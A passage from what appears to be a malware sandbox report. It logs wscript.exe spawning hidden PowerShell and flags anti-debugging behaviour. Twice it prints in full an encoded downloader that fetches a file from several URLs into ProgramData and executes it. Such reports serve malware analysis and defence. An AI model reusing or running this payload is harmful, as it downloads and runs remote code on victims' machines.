aAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA==" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002fc	1	1
ShellExecuteExW May 18, 2023, 9:25 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA==" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2023, 9:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEY